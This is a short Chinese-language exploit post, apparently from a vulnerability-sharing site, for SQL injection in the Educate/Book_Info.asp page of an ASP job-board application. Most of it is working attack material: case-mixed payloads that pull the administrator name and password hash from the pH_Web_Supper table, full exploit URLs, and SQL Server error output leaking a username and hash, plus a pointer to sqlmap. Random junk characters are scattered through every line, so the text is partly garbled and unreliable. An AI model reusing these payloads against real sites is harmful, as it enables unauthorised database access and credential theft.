漏洞出现在Educate/Book_Info.asp# J0 ^1 D0 C' f3 j7 C% w% ] X" L
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
6 ~0 J J2 y$ F0 f# `' ]. Jexp:如下6 Q5 _- V7 Q$ z: e
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
4 c; t0 M8 B% N# t! Y查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)3 _+ x1 l9 @$ u+ D1 Q* x
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper) r# H/ M- }( F/ q3 b" W) H% j
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
% |. W: k! E: d+ u& X% @* B将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。$ X1 V9 L3 `6 I
/Educate/Book_Info.asp,行 8& N5 R$ C) ~$ J L; o
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
. p, C& Q5 Y# d4 Q( J; y3 }9 P0 oMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'$ h% `" B: A) R- _/ N$ L1 x
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
) M [0 C' J! f1 O" w& l2 J/Educate/Book_Info.asp,行 8 |